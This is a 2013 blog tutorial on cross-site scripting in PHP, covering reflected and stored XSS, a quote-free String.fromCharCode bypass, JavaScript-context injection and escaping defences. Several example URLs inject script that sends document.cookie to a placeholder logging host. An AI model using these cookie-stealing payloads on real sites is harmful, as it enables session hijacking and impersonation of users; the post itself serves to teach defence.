What is XSS and how to protect your website

Tags: webdevelopment, security, programming.
By lucb1e on 2013-02-07 22:42:23 +0100

Alternative title: How do XSS attacks work and how can you exploit them.
To secure things you must know how they work, right? ;) The post mainly focuses on how it works and how to protect your website though, so let's dive right into it.

First of all, XSS means cross-site scripting. The name is a bit misleading since it isn't necessarily cross-site; it's basically just inserting scripts in places where other users will unknowingly trigger them.
Wikipedia's definition: "inject client-side script into Web pages viewed by other users".

This kind of attack is possible when output isn't escaped. For clarity, by escaping I mean the process of converting data to a format where it is non-executable in the place where it is used. For example, <script>alert(1);</script> is executable when used in HTML, but not when inserted into a database.

The difference between input and output escaping is quite thin. When inserting user-supplied data into a database, you could say that it's output escaping because you're outputting it to the database. I like to define the difference as storing or displaying the data. This makes XSS an output escaping problem, and not an input escaping problem. Of course both should be done, and at the appropriate time: input escaping when you're inserting the data into the database, and output escaping when you display it to the user.

But I'll get back to this later. Let's first talk some more about XSS attacks. For example, this is a vulnerable page:
<?php echo $_GET["test"];
Because this way you can make someone run JavaScript by getting them to open a link like this:
example.com/page.php?test=<script>alert(1);</script>

So far it seems harmless, and it is. But what if your website has a login system? As you know, the cookie keeps users logged in between pages (session_start() does that). So now if you do...
example.com/page.php?test=<script>location="http://yoursite/log.php?c=" + document.cookie;</script>
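This allows you to see the cookie of whoever is logged in, after which you can impersonate them. Worse, on a banking site you could use an XSS attack to change whom the money is being sent to. (In a real link the + has to be written as %2B, because PHP decodes a + in the query string as a space.)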

Some websites have so-called magic quotes (a PHP feature that was removed in PHP 5.4), which automatically escape any quotes and backslashes: " to \", ' to \' and \ to \\. This is meant to prevent SQL injections, and it also partially helps against XSS because any quote would break the JavaScript code with a syntax error. However, there is a solution for everything, and this totally circumvents the fix: build every string from character codes with String.fromCharCode(), so the script doesn't need a single quote.
Written out in full this is very long, and may exceed some maximum length. Doing some minification, we get this:

example.com/page.php?test=<script>location=String.fromCharCode(47,47,121,111,117,114,115,105,116,101,46,116,108,100,47,63).concat(document.cookie)</script>
Not small, but doable, and it works. What is this actually? Well, every character has a code; for example, the letter A is code 65. Converting text to codes can be done with a little (maybe self-written) script, like this one: http://jsfiddle.net/xq2b2/
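In case the linked script is unavailable, the conversion can be sketched in a few lines of JavaScript. This is only an illustration of the idea, not the code behind that link; toCharCodeExpression and fromCharCodes are names I made up for it.

```javascript
// Turn a string into a String.fromCharCode(...) expression that
// evaluates to the same string without containing any quotes.
function toCharCodeExpression(text) {
  const codes = [];
  for (let i = 0; i < text.length; i++) {
    codes.push(text.charCodeAt(i)); // UTF-16 code unit of each character
  }
  return "String.fromCharCode(" + codes.join(",") + ")";
}

// The reverse direction, handy for reading a payload someone else wrote.
function fromCharCodes(codes) {
  return String.fromCharCode(...codes);
}

console.log(toCharCodeExpression("A")); // String.fromCharCode(65)
console.log(fromCharCodes([121, 111, 117, 114, 115, 105, 116, 101])); // yoursite
```

Being able to decode such a list is also useful on the defending side, when you find one in your logs and want to know what it says.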

There are two problems with this approach though: 1) you still need to get people to open that link, and 2) Chrome prevents doing this. At the time of writing, Chrome blocks any script that also appears in the request, for example one embedded in a $_GET or $_POST parameter. But other browsers, older versions of Internet Explorer for example, will happily execute that script for you, so odds are it's no problem.

The best way to execute XSS is to find a field that gets displayed to others and is not protected, because this circumvents both problems. People will automatically visit the page sooner or later, and Chrome will also execute it. For example, if you can use a <script> tag in your username when registering on a forum, you can execute any JavaScript in the browser of every visitor!

How to protect your site against XSS?
In PHP, when outputting to HTML, use htmlspecialchars():
<?php echo htmlspecialchars($_GET["test"]);

Now any attack like in the example above will be impossible, because you can't use the <script> tag. It will be encoded to &lt;script&gt;.
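To see what that encoding does, here is a rough JavaScript equivalent. It is a sketch and not PHP's implementation: escapeHtml is a hypothetical helper that replaces the same five characters htmlspecialchars() replaces when it is called with the ENT_QUOTES flag.

```javascript
// Characters with a special meaning in HTML and their entity replacements.
const HTML_ENTITIES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#039;",
};

// Hypothetical helper, modelled on htmlspecialchars($text, ENT_QUOTES).
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

console.log(escapeHtml("<script>alert(1);</script>"));
// &lt;script&gt;alert(1);&lt;/script&gt;
```

The browser shows the result as the literal text <script>alert(1);</script> instead of treating it as a tag.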

However, you must always encode the output for whatever language you are using the data in! For example, on the following page you can still use XSS because the data was formatted for HTML instead of JavaScript. With its default flags before PHP 8.1, htmlspecialchars() encodes double quotes but leaves single quotes alone:
userid = '<?php echo htmlspecialchars($_GET["userid"]);?>';
alert("Hello, " + getUserById(userid));

Exploit: example.com/page.php?userid=';location='http://yoursite.tld/?'%2Bdocument.cookie%2B'
(%2B is a URL-encoded +.)

Fix: By escaping ' and \ with a backslash, you can't do this anymore. But even if you do that, you still need htmlspecialchars, because </script> works even inside strings. It will end the JS block and start on HTML, which you can then change back to JS to start XSS (a userid of </script><script>alert(1);</script> is enough). Example page:
userid = '<?php echo addslashes($_GET["userid"]);?>';
alert("Hello, " + getUserById(userid));

In case you don't recognize them, the % codes you see in exploit links (such as %3C for <) are just standard URL encoding. Again a form of escaping actually, because if you have a file named "a?b" this won't work: "example.com/a?b". You need to escape the "?" to %3F (so it becomes "example.com/a%3Fb"). You can decode it with unescape() or decodeURIComponent() in JavaScript, or urldecode() in PHP. Anyway...
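If you want to try URL encoding yourself, JavaScript has it built in. A small sketch; buildLink is a hypothetical helper and the page and parameter names are just the ones from the examples in this post.

```javascript
// Hypothetical helper: build a link with the parameter value URL-encoded.
function buildLink(page, name, value) {
  return page + "?" + name + "=" + encodeURIComponent(value);
}

console.log(encodeURIComponent("a?b"));   // a%3Fb
console.log(decodeURIComponent("a%3Fb")); // a?b

console.log(buildLink("example.com/page.php", "test", "<script>alert(1+1);</script>"));
// example.com/page.php?test=%3Cscript%3Ealert(1%2B1)%3B%3C%2Fscript%3E
```

Note that the + became %2B. Left as a plain +, PHP would have decoded it to a space.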

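Fix: escape for JavaScript first and wrap that in htmlspecialchars(): <?php echo htmlspecialchars(addslashes($_GET["userid"]));?>
addslashes() puts a backslash before both kinds of quotes and before the backslash itself, which a str_replace on the quote alone would miss.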
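A different technique from the htmlspecialchars() combination above is to emit the value as a complete JavaScript string literal. Below is a sketch of that idea in JavaScript, assuming the page is generated by server-side JavaScript; jsStringLiteral is a hypothetical helper, not a built-in. In PHP, json_encode() with the JSON_HEX_TAG flag plays a similar role.

```javascript
// Hypothetical helper: returns a complete, quoted JavaScript string literal.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)) // escapes ", \ and control characters
    .replace(/</g, "\\u003c")          // so </script> cannot end the block
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")     // line separators that older engines
    .replace(/\u2029/g, "\\u2029");    // treat as line breaks inside strings
}

// Stand-in for $_GET["userid"]
const userid = "</script><script>alert(1);</script>";
const line = "userid = " + jsStringLiteral(userid) + ";";
console.log(line);
// userid = "\u003c/script\u003e\u003cscript\u003ealert(1);\u003c/script\u003e";
```

The advantage over HTML entities is that the script receives the original value again: a name containing & or < is not mangled, and the quotes are part of the output so you can't forget them.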

A little more about input and output escaping
The thing is that you should do input escaping when storing the data, and output escaping when displaying it (as I said before). You can also do output escaping when storing the data, and that would successfully prevent an attack, but it's not a great solution. I'll give some examples first:

Input escaping:
query("INSERT INTO users (name) VALUES('" . escape($_GET["user"]) . "')");

Output escaping and displaying:
echo htmlspecialchars(query("SELECT name FROM users WHERE userid = 1"));

Output escaping on top of input escaping, then displaying:
$user = htmlspecialchars(escape($_GET["user"]));
query("INSERT INTO users (name) VALUES('$user')");
echo query("SELECT name FROM users WHERE id = " . just_inserted_id());

Both methods are secure (input and then output, or on top of each other). However, when doing only input escaping, the database will store the correct username. When doing it on top of each other, the database will store the value escaped for HTML. If you are then using the username in Javascript, it will display incorrectly, and possibly insecurely.

Moreover, when storing the escaped value (for whatever language), it takes more storage space. Every < will take 4 times as much space as it normally would. To be fair though, there is also something to be said for the processing power it takes to escape the data every time you display it, instead of doing it once when storing. So it depends on the circumstances, though I'd generally advise doing the right escaping at the right time.
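To make the trade-off a bit more concrete, here is a small JavaScript sketch. escapeHtml is a hypothetical stand-in for htmlspecialchars(), and the username is made up.

```javascript
// Hypothetical stand-in for htmlspecialchars(), covering &, < and > only.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;" };
  return String(text).replace(/[&<>]/g, (ch) => map[ch]);
}

const name = "<b>Tom & Jerry</b>"; // what the user typed
const stored = escapeHtml(name);   // what ends up in the database

console.log(name.length);   // 18
console.log(stored.length); // 34

// Used outside HTML (in an alert, an e-mail, a CSV export) the stored value
// shows its entities literally:
console.log("Hello, " + stored);
// Hello, &lt;b&gt;Tom &amp; Jerry&lt;/b&gt;

// And a template that escapes on output, as it should, escapes it twice:
console.log(escapeHtml(stored));
// &amp;lt;b&amp;gt;Tom &amp;amp; Jerry&amp;lt;/b&amp;gt;
```

Storing the raw value and escaping at display time avoids both problems, at the cost of running the escape function on every page view.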

Related / recommended further reading: lucb1e.com/!csrf